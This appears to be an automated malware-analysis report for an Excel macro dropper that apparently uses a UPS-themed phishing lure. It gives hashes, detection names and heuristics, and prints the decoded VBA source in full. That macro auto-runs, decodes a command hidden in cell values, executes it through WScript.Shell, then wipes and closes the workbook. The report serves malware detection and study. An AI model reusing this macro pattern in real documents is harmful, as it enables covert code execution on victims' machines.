Xls.Dropper.Agent-7792261-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 86fc375a2fca3cad…

MALICIOUS

Office (OLE)

77.0 KB Created: 2020-05-13 10:03:57 First seen: 2020-09-15
MD5: 53e79aef2353c5a8c774e4bf0e5813ca SHA-1: 3d08d5db2b106c46b6208e0083addbdf23b20e3e SHA-256: 86fc375a2fca3cad9cc84cef106ebde475def1edf7f0fb23f80a40eb8927a643
220 Risk Score

Malware Insights

Xls.Dropper.Agent-7792261-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is an OLE document containing VBA macros. The macros utilize WScript.Shell and CreateObject to execute arbitrary commands, specifically attempting to run a command constructed from cell constants. This script likely downloads and executes a second-stage payload, as indicated by the ClamAV detection name 'Xls.Dropper.Agent-7792261-0'. The presence of 'United Parcel Service' in the document body suggests a potential lure for phishing.

Heuristics 5

  • ClamAV: Xls.Dropper.Agent-7792261-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7792261-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    a = ActiveSheet.UsedRange: i = 1
For Each px In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): textbbox = textbbox + Chr((px + i)): Next px: WScript.Quit = (CreateObject("WScript.Shell").Exec(textbbox).StdOut.ReadAll())
chartO
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    a = ActiveSheet.UsedRange: i = 1
For Each px In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): textbbox = textbbox + Chr((px + i)): Next px: WScript.Quit = (CreateObject("WScript.Shell").Exec(textbbox).StdOut.ReadAll())
chartO
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1177 bytes
SHA-256: 827dbadb66d51cd503a6db2fa95d3a1cdb1ab00525c367279ff3d8023735f9e1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "dataview, 3, 0, MSForms, CommandButton"
Attribute VB_Control = "print3, 2, 1, MSForms, Frame"

Private Sub print3_Layout()
On Error Resume Next
a = ActiveSheet.UsedRange: i = 1
For Each px In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): textbbox = textbbox + Chr((px + i)): Next px: WScript.Quit = (CreateObject("WScript.Shell").Exec(textbbox).StdOut.ReadAll())
chartO
End Sub
Sub chartO()
Cells.Clear: With ActiveSheet: .Protect: End With: Application.Wait (Now + TimeValue("0:00:05"))
ActiveWorkbook.Close False
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.